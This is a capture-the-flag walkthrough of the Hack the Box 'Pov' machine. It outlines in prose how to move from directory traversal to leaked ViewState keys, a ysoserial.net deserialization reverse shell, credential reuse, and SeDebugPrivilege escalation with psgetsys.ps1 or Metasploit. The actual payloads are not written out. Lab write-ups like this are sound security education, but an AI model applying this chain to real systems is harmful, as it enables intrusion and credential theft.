In this post, I would like to share a walkthrough of the Pov Machine from Hack the Box
This room will be considered a medium machine on Hack the Box
What will you gain from the Pov machine?
For the user flag, you must to exploit a file read and directory traversal vulnerability on the web page, read the ASP.NET secrets used for VIEWSTATE. Then, use ysoserial.net to craft a malicious serialized .NET payload to achieve code execution
As for the root flag, you need to exploit a PowerShell credential, and then utilize SeDebugPrivilege through both Metasploit and a PowerShell script (psgetsys.ps1).
Information Gathering on Pov Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
[darknite@parrot]─[~/Documents/htb/pov]
└──╼ $nmap -sV -sC 10.10.11.251 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-08 06:42 EDT
Nmap scan report for 10.10.11.251
Host is up (0.29s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.08 seconds
┌─[darknite@parrot]─[~/Documents/htb/pov]
└──╼ $
Let’s access the website interface
There is nothing that we can see interesting on the website interface
There is also not much information that we can look into regarding the response via Burpsuite
Therefore, let’s enumerate the directory on the pov.htb by using gobuster tool
As a result, we can try to enumerate subdomains by using the same tool which is gobuster
From the subdomain, we are provided with a potential username on the machine
We can also read the profile of Stephen Fitz and we notice there’s a Download CV button which leads to the portfolio directory
I did notice that the data is shown below
__EVENTTARGET=download&
__EVENTARGUMENT=&
__VIEWSTATE=DY%2FikU7FyXJZCW0op4Kz6Bgqd4o%2FFtEfEsiowrOTlRKwk96TfCKJt6cwtTy82KRl93H2SNf4FCvmzZuhMaKfKMCbzZg%3D&
__VIEWSTATEGENERATOR=8E0F0FA3&
__EVENTVALIDATION=eGOIJz%2BJA4RbAfYNdIjP%2FXmYDtUaz97UabMUsYu%2Bg8ppRuevK%2FWEufVY9E0M8KqssT57LzrVSlgu%2FzTmjoojoiS270xt9sBSLasZ2CSk2sh4uF3oBk9hMWE%2FILb9D20b1kQDEA%3D%3D
&file=cv.pdf
If you look in the file section, there’s a file cv.pdf which we can download on our attacker’s machine
On the browser, we managed to see the actual CV of Stephen
Sadly, we cannot retrieve the /etc/passwd by using this method
Let’s see the configuration on the web.config
There is a lot of useful information that we can use to exploit it
Using the ysoserial tool to retrieve the reverse shell on pov machine
Let’s do some research on the ViewStateUserKeys and manage to find this page here to help us on the next step
Firstly, let’s exploit that mentioned on the website on Parrot OS(the machine that I use for playing this machine) but sadly, we have an error while executing the command
Again, we cannot execute the command even though I try on Linux PowerShell
As a last resort, we need to execute the command within Windows OS.
We managed to find a contact page that might be vulnerable to the attack
Let’s change the payload by included the contact.aspx on the path
We should copy-paste the payload as shown above
Let’s start our listener on our attacker’s machine
At last, we managed to retrieve a reverse shell connection back to us
The privileges of the sfitz are limited to two which are SeChangeNotifyPrivilege and SeIncreaseWorkingSetPrivilege state
We managed to find an XML file format within the Sfitz Document folder
The file did contain the information as shown above.
At last, we managed to retrieve the Username and Password
Let’s upload the RunasCs.exe into the victim’s machine
It looks like works a charm!
We should be getting shell by executing the command above
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges Access
Firstly, we have a clear idea of the Privileges access of the users that we accessed
Let’s see the full access by bypassing the PowerShell
Let’s upload psgetsys.ps1 into the victim’s machine
However, it looks like some error appeared while trying to import the module
Therefore, let’s move the ps1 file into the programdata
It looks promising at this point
As a result, let’s upload nc.exe file into the victim’s machine
We should be looking at the process of the winlogon by using the Get-Process
Therefore, let’s execute the command above which shows an error appear
Let’s do some port-forwarding on the victim’s machine
After a while, the port-forwarding works as shown in the screenshot above
Let’s access the machine as alaading using the evil-winrm command
It looks promising at this point
Finally, we managed to retrieve the reverse shell connection back to us
We can read the root flag by typing the “type root.txt” command
Another way to obtain root via Metasploit
Normally, I will not even try using the Metasploit method but I do the method for learning sake
Firstly, we should create a malicious file by using msfvenom tool
Let’s start our listener on the Metasploit tool
We can use the same previous command which only changes the end of the command to the malicious file
Boom! We have successfully obtained the session on the Metasploit
From here, we can do a similar step as the one that we use without the Metasploit
Boom! We have the root flag
We also can obtain the hash using hashdump
No responses yet